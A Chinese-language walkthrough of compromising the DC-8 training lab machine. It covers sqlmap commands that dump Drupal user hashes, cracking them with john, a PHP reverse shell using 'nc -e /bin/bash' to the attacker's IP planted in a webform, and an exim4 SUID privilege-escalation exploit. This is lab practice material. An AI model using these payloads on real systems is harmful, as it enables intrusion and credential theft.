DC-8靶机渗透测试

DC-8靶机

信息收集

1.nmap扫描出主机IP为192.168.78.156 开放80和22端口，没扫出来什么漏洞，但是发现robots.txt文件，给出了后台登录地址/usr/login

web渗透

1.登陆到主页发现是drupal框架，使用nmap也没扫出来什么，通过点击不同的页面，似乎发现了SQL注入的地方，点击下面的小标签返回了nid=2

2.使用手工测试一下是否存在注入点，输入’返回了mysql数据库的错误，发现有

3.接下来测试是字符注入还是数字型注入，'#和 and 1=1，确定是数字型注入

4.使用SQLmap对注入点进行进行注入攻击测试`

python sqlmap.py -u http://192.168.78.156/?nid=2 -dbms mysql -batch -dbs

5.进行继续获取表，数据，直到读取了账号和密码paylaod为

python sqlmap.py -u http://192.168.78.156/?nid=2 -dbms mysql -batch -D d7db -T users -C name,pass -dump

admin  $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z 
john   $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

6.很明显提示出了使用john进行密码破解，将密码保存到文件中，使用john破解hash得到相应的账密 john / turtle

7.尝试进行ssh登录发现失败，去访问/usr/login页面，输入获得的账密登录到后台

获取权限

1.来到后台目录，尝试找到可以修改页面代码的功能，而且还能解析php的功能
2.根据尝试，找到提交反馈意见的界面，输入信息提交之后会显示提示语，而且该模块能自己编写提示语，还能写入php语言
3.在该界面，点击edit，找到WEBFORM处可以编辑并执行PHP代码

4.直接在界面写入反弹shell的php代码

<?php
system("nc -e /bin/bash 192.168.78.145 7777");
?> 

5.将提交重定向行Confirmation page（确认页面）给勾上，然后滑下点保存，继续来到contact界面，联系随便填入联系表单，点击发送，触发PHP代码

6.来到kali主机上，查看监听的本地端口已经反弹回来了shell

权限提升

1.进入到shell尝试很多方法，寻找home目录文件有无信息，sudo -l有没有提权，/etc/passwd和/etc/sudoers的权限，查看了密码文件查看用户只有dc8user
2.使用suid提前尝试一下

find / -user root -perm -4000 -print 2>/dev/null

3.发现了老朋友exim4，前面就利用这个漏洞成功提过权，直接wget进行下载POC。一开始下载失败，发现是权限不够，应该是目录的问题，来到tmp文件下。

4.一开始直接执行发现提权失败，使用./1.sh -m netcat命令发现才可以提权，使用id查看成功提权到了root

5.进行读取flag文件，但是读取没一会发现权限就掉回去了，不太稳定捏

靶机总结

1. 本次靶机的关键点就在于web界面的SQL注入能否发现了
2. 多尝试点击点击页面，查看url数据可能会发现SQL注入的注入点
3. 测试注入点成功，可以直接使用sqlmap进行注入点攻击
4. john 破解 hash密码
5. drupal的网站后台来到contact的WEBFORM功能可以写入php代码进行反弹shell的操作
6. 提权方式还是依旧的几种，本次的exim4提权，需要使用提权代码 ./1.sh -m netcat，增加了一个参数